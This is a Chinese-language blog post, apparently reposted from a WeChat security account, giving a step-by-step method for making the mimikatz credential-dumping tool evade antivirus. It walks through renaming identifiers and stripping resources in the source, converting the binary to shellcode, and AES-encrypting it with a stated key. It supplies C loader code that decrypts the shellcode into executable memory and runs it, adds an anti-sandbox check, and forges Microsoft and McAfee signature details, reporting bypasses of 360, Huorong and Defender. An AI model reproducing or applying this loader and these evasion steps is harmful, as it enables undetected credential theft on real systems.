前言
关于mimikatz,之前有做过一些免杀尝试,但是效果不好,仅仅只能短暂躲避360的查杀,这几天看了很多mimikatz免杀的文章有了一些新的想法,于是再次尝试mimikatz免杀。
整个免杀的过程比较曲折且艰难,先是尝试源码免杀,发现源码免杀比较艰难(mimikatz是一个个非常复杂的项目,想要实现源码免杀,需要不断的定位特征码,然后消除特征,我比较菜,无法通过定位到的特征找到对应的源代码),简易的源码免杀已无法对杀软产生太大的作用,于是做了一些简单的处理后放弃了源码免杀。之前有了解github上有项目可以把exe转换成可执行的shellcode,于是想着尝试利用这个项目把mimikatz转换成shellcode,通过shellcode加载器去执行,这样可能会绕过杀软检测,最后也是实现了不错的免杀效果。
免杀过程
首先进行源码免杀,虽说免杀效果不好,但是处理过的总比不做处理要好一点。下载mimikatz源码,项目地址https://github.com/gentilkiwi/mimikatz,运行mimikatz.sln,需要对vs进行一些修改,右键mimikatz项目名称,选择平台工具集,我的vs是2019,选择2019即可
接着需要安装MFC,在开始界面选择visual Studio Installer运行,点击修改
勾选MFC,其他默认进行安装即可
重新打开mimikatz.sln,右键项目属性修改这几个地方
修改完后保存,右键解决方案,修改配置属性为X64
对mimikatz关键字进行替换把mimikatz替换成mihoutao,大写和小写都进行替换,vs选择编辑-查找和替换-在文件中替换,勾选区分大小写,点全部替换即可
接着对mimikatz作者的信息进行去除,在整个解决方案搜索替换成空即可
替换后为
在mimikatz.c中对mimikatz打开时的输出信息进行修改,修改成你想要的即可,我这里修改后是这样
对mimikaz文件名进行修改,所有的mimikatz命名的文件都修改掉,我修改后是这样子
注意里面有几个.def后缀的文件,修改文件名后,需要在属性-链接器中修改成对应的名称
接着删去mimikatz的资源文件,把.rz和.ico后缀的文件全部删除,删完如下
对mimikatz重新生成,看是否还能正常使用,右键mihoutao(修改后的项目名称)点击重新生成即可,这里一定不要选择重新生成解决方案,否则会编译不成功
运行编译后的程序,抓取hash可以正常使用,源码简单处理完成。
使用项目https://github.com/hasherezade/pe_to_shellcode,把编译后的程序转换成可执行的shellcode,用法:命令行输入pe2shc.exe mihoutao.exe -o 1.bin,得到shellcode。对shellcode进行处理,还是使用aes加密,把aes加密后的16进制字符串保存到encrypted.txt中。接着就是要写一个loader来对encrypted.txt中的shellcode进行解密并执行。
解密和加密使用的模式和key要保持一致,我使用的ECB模式,key设置为1234567812345678
// ... decrypt函数 ...intdecrypt(unsignedchar* ciphertext,intciphertext_len,unsignedchar* key,unsignedchar* plaintext){EVP_CIPHER_CTX* ctx;intlen;intplaintext_len;// 创建并初始化解密上下文if(!(ctx = EVP_CIPHER_CTX_new())) handleErrors();// 初始化解密操作if(1!= EVP_DecryptInit_ex(ctx, EVP_aes_128_ecb(),NULL, key,NULL))handleErrors();// 提供要解密的消息,并获取明文输出if(1!= EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len))handleErrors();plaintext_len = len;// 完成解密过程if(1!= EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) handleErrors();plaintext_len += len;// 清理EVP_CIPHER_CTX_free(ctx);returnplaintext_len;}
这里我把encrypted.txt放到项目目录下,通过资源加载的方式对shellcode进行读取,右键资源文件把encrypted.txt加载进来,文件类型TEXT保存即可
需要对资源文件进行修改,打开resource.h,添加#define IDR_ENCRYPTED_TEXT 101
rz文件中检查是否存在这一行,IDR_TEXT1 TEXT "encrypted.txt",没有就添加好
读取资源文件的代码
// 读取资源文件HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_ENCRYPTED_TEXT), TEXT("TEXT"));if(hRes ==NULL) {// 处理错误return1;}HGLOBAL hData = LoadResource(NULL, hRes);if(hData ==NULL) {// 处理错误return1;}char* data = (char*)LockResource(hData);DWORD dataSize = SizeofResource(NULL, hRes);// 请确保资源数据是以NULL结尾的字符串char* hex_encrypted_shellcode = (char*)malloc(dataSize +1);if(hex_encrypted_shellcode ==NULL) {perror("malloc");return1;}memcpy(hex_encrypted_shellcode, data, dataSize);hex_encrypted_shellcode[dataSize] ='�';
解密shellcode并执行
// 计算十六进制字符串表示的shellcode的长度size_thex_shellcode_len =strlen(hex_encrypted_shellcode);// 分配内存以存储二进制形式的shellcodesize_tbin_shellcode_len = hex_shellcode_len /2;unsignedchar* bin_encrypted_shellcode = (unsignedchar*)malloc(bin_shellcode_len);if(bin_encrypted_shellcode ==NULL) {perror("malloc");free(hex_encrypted_shellcode);return1;}// 将十六进制字符串转换为二进制数据hex_to_bin(hex_encrypted_shellcode, bin_encrypted_shellcode, bin_shellcode_len);// 分配内存以存储解密后的shellcodeunsignedchar* decrypted_shellcode = (unsignedchar*)malloc(bin_shellcode_len);// 使用原始长度if(decrypted_shellcode ==NULL) {perror("malloc");free(bin_encrypted_shellcode);free(hex_encrypted_shellcode);return1;}// 解密shellcodeintdecrypted_len = decrypt(bin_encrypted_shellcode, bin_shellcode_len, key, decrypted_shellcode);if(decrypted_len ==-1) {// 解密失败,处理错误handleErrors();// 清理代码应该在 handleErrors 之前或之后(如果 handleErrors 不退出)}// 分配可执行内存void* exec = VirtualAlloc(0, decrypted_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);if(exec ==NULL) {perror("VirtualAlloc");free(decrypted_shellcode);free(bin_encrypted_shellcode);return1;}memcpy(exec, decrypted_shellcode, decrypted_len);// 转换为函数指针并执行void(*func)() = (void(*)())exec;func();
然后再添加反沙箱代码
// 获取可执行文件的完整路径if(GetModuleFileName(NULL, exePath, MAX_PATH) ==0) {// 处理错误perror("GetModuleFileName failed");return1;}// 从可执行文件路径中移除文件名,只留下目录PathRemoveFileSpec(exePath);// 构建1.txt文件的完整路径PathCombine(filePath, exePath,"1.txt");// 检查文件是否存在attributes = GetFileAttributes(filePath);if(attributes == INVALID_FILE_ATTRIBUTES) {// 文件不存在或发生错误perror("GetFileAttributes failed");return1;// 或者你可以根据需要进行其他处理}
这样一个aes解密的loader就完成了,对代码进行编译测试免杀效果,这个时候我遇到一个问题,编译后的exe在defender环境疯狂查杀,一开始我以为是我代码的问题,于是我对关键代码进行注释,一步步排查问题,我把所有函数都注释完了进行编译仍然报毒被杀,这让我百思不得其解,然后我突然想要是不是我这个项目名称的问题,我一开始的项目名称是mimikatz_loader,所以我进入这个项目的文件夹,发现果然存在好几个mimikatz命名的文件,这可能就是defender查杀我的原因
所以我新建了一个项目,重新编译了一下,再次放进defender环境,果然不杀了。所以一定不要用mimikatz作为项目名称,否则就会被杀软认定为恶意程序。这个时候虽然过了静态查杀,但是又出现了另一个问题,我的程序运行之后并没有弹出mimikatz的窗口,弹不出命令行说明无法执行命令,意味着这个loader写的没有意义,这个问题我想了一晚上突然茅塞顿开,想要了一个导致这个问题的原因,那就是我创建的项目是windows桌面应用,而mimikatz是一个命令行工具。在我把程序调整成控制台应用再次编译执行,发现成功弹出mimikatz的命令行,问题解决。最后对mihoutao添加微软的详细信息和McAfee的签名,如下
免杀完成!
免杀效果
360核晶防护环境
火绒环境
defender环境
VT和微步云沙箱测试结果
总结
1.在mimikatz免杀项目中,不要使用mimikatz来对文件或项目命名,否则会碰到杀软的无情查杀。2.mimikatz本质上是一个命令行工具,创建vs项目要选择控制台应用,这是一个血淋淋的教训,切记切记。3.AES算法用来做免杀loader非常不错,建议都去尝试下。
原文始发于微信公众号(听风安全):峰回路转之mimikatz通杀杀软
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论